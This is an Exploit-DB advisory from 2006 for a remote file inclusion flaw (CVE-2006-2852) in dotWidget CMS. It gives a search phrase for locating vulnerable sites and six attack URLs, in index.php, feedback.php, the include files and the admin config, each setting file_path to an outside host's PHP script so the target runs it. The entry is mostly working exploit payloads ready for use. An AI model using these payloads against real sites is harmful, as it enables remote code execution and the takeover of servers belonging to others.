dotWidget CMS <= 1.0.6 file_path Remote File Include Vulnerabilities

2006-06-05T00:00:00
ID EDB-ID:1879
Type exploitdb
Reporter Aesthetico
Modified 2006-06-05T00:00:00

Description

dotWidget CMS <= 1.0.6 (file_path) Remote File Include Vulnerabilities. CVE-2006-2852. Webapps exploit for php platform

                                        
                                            Title: dotWidget CMS &lt;= 1.0.6 - Remote File Include Vulnerability
-----------------------------------------------------------------
Vendor: dotWidget
URL: http://dotwigdet.com
-----------------------------------------------------------------

Credits:
Discovered by: 'Aesthetico'
http://www.majorsecurity.de
-----------------------------------------------------------------
Search for: "dotwidget Printer-friendly"
-----------------------------------------------------------------

Exploitation:

/index.php?file_path=http://www.yourspace.com/yourscript.php?
/feedback.php?file_path=http://www.yourspace.com/yourscript.php?
/printfriendly.php?file_path=http://www.yourspace.com/yourscript.php?

EvilCookie &lt;dorshirl[at]zahav.net.il&gt; submitted these extra file_path issues.

/includes/common.inc?file_path=http://www.yourspace.com/yourscript.php?
/includes/nav.inc?file_path=http://www.yourspace.com/yourscript.php?
/admin/dotwidgetc_config.php?file_path=http://www.yourspace.com/yourscript.php?

# milw0rm.com [2006-06-05]